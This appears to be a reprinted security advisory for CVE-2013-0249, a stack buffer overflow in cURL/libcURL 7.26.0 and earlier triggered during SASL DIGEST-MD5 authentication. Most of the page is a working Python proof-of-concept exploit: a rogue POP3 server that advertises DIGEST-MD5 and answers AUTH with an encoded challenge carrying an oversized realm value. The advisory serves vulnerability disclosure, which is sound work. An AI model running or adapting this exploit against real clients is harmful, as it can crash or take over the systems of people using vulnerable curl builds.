|
|
|
|
| |
Credit:
The information has been provided by Volema.
The original article can be found at: http://curl.haxx.se/docs/adv_20130206.html
|
| |
Vulnerable Systems:
* cURL 7.26.0 and prior
* cURL libcURL 7.26.0 and prior
cURL and libcURL contain an overflow condition in the 'Curl_sasl_create_digest_md5_message()' function [lib/curl_sasl.c]. The issue is triggered when communicating using the POP3, SMTP, or IMAP protocol as user-supplied input is not properly validated when negotiating SASL DIGEST-MD5 authentication. This may allow a remote attacker to cause a stack-based buffer overflow, resulting in arbitrary code execution.
Exploit:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# curl pop3 CVE-2013-0249 by Volema/MSLC
import socket
import base64
host = "localhost"
port = 110
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((host, port))
s.listen(5)
sock, addr = s.accept()
sock.send('+OK POP3 server ready\n')
while True:
buf = sock.recv(1024)
print buf
if buf.find('USER') > -1:
sock.send('+OK\n')
if buf.find('PASS') > -1:
sock.send('-ERR 999\n')
if buf.find('CAPA') > -1:
resp = '+OK List of capabilities follows\n'
resp += 'SASL DIGEST-MD5\n'
resp += 'IMPLEMENTATION dumbydumb POP3 server\n'
resp += '.\n'
sock.send(resp)
if buf.find('QUIT') > -1:
sock.send('+OK')
break
if buf.find('AUTH') > -1:
realm = 'A'*128
payload = 'realm="%s",nonce="OA6MG9tEQGm2hh",qop="auth",algorithm=md5-sess,charset=utf-8' % realm
resp = '+ '+base64.b64encode(payload)+'\n'
print resp
sock.send(resp)
sock.close()
CVE Information:
2013-0249
Disclosure Timeline:
Vendor Solution Date :2013-02-07
Disclosure Date :2013-02-07
Exploit Publish Date :2013-02-06
|
|
|
|
|
